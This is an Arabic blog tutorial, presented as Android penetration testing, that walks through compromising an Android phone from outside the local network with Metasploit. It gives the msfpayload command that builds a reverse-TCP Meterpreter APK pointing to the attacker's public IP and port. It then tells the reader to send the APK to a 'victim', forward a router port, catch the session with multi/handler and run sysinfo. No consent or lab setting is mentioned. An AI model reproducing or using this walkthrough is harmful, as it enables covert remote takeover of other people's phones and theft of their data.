سيناريو اختراق الاندرويد عن بعد – خارج الشبكة Android Pentest
السلام عليكم
سوف نشرح موضوع مهم الكثير يسئل عنه في اختبار الاختراق وهو
اختراق الاندرويد عن بعد – من خارج الشبكة
طبعاً الاختراق يتم عبر الميتاسبلويت وسوف نشرح فقط جزئية الاختراق الخارجي لن نتطرق الى التفاصيل لأنها موضوع اخر.
مع تنامي توسع نظام اندرويد على الهواتف كان ولا بد من تطوير ايضاً من ملفات لأختراقه وفحصة ايضاً.
الميتاسبلويت اضاف payload خاص في اختراق الاندرويد ولكن الكثير سئلني عن الشرح السابق لأنه الطريقه ضعيفة لأن الشرح تم داخل الشبكة ولكن للأسف من يضع الاسئله ليس لديه معرفة كاملة عن الاختراق وكيف يتم الاتصال بين المهاجم والضحية .
دعونا نبداء بالتطبيق اولاً الاختراق لا يختلف عن اختراق الاجهزه او المنصات الاخرى فقط الجديد هو
android/meterpreter/reverse_tcp
امر انشاء البايلود
msfpayload android/meterpreter/reverse_tcp lhost=131.117.163.30 LPORT=1234 R > Desktop/shaja.apk

طبعاً نركز عنا في LHOST
مش لازم يعني تضع هنا الايبي الداخلي لجهازك في الشبكة ويعني الايبي الخاص بك الذي الضحية سوف يقوم الاتصال به .
هنا نضع الايبي الخارجي وتستطيع الحصول عليه من الروتر تبعك او بزيارة احد المواقع مثل
www.whatismyipaddress.com
هنا النقطه الهامه في الانشاء
بعد صنع البايلود وأرسالة للهدف نبداء نستقبل الاتصال عبر
multi/handler
نحن وضعنا الايبي الخارجي كيف نستقبل الضحيه ويصل الى جهاز المخترق .
الامر يتم هنا مثل طريقة اختراق الاجهزه يتم فتح بورت للأيبي الخاص بجهاز المخترق الداخلي في الشبكة بالبورت الي تم تحديده اثناء صنع البايلود.
كما في الصورة فتح بورت داخل الشبكة وأعادة توجيه الاتصالات الى الايبي الخاص بجهاز المخترق
طبعاً يتم جلب الايبي في الشبكة عبر الامر
ifconfig
فتحنا الان البورت لعنوان الايبي تبعنا ونبداء التنصت على البايلود الي انشأناه
وندخل كما تحدثنا البورت والايبي الداخلي في التنصت وهنا النقطة في الاختراق الخارجي ما بين انشاء البايلود والتنصت
نبداء بالامر run وونتظر حتى يتم الاتصال
وبعد الاتصال سوف تشاهد عنوان الايبي الخارجي الخاص بالضحية
كما نلاحظ تم الاختراق بالايبي الخارجي .
والنظام المخترق اندوريد
نجلب المعلومة عبر الامر sysinfo
نرجوا بأن تكون الفكرة قد وصلتكم.
انتظرونا في دروس اخرى.
تحياتي
عبدالسلام شاجع
إرسال التعليق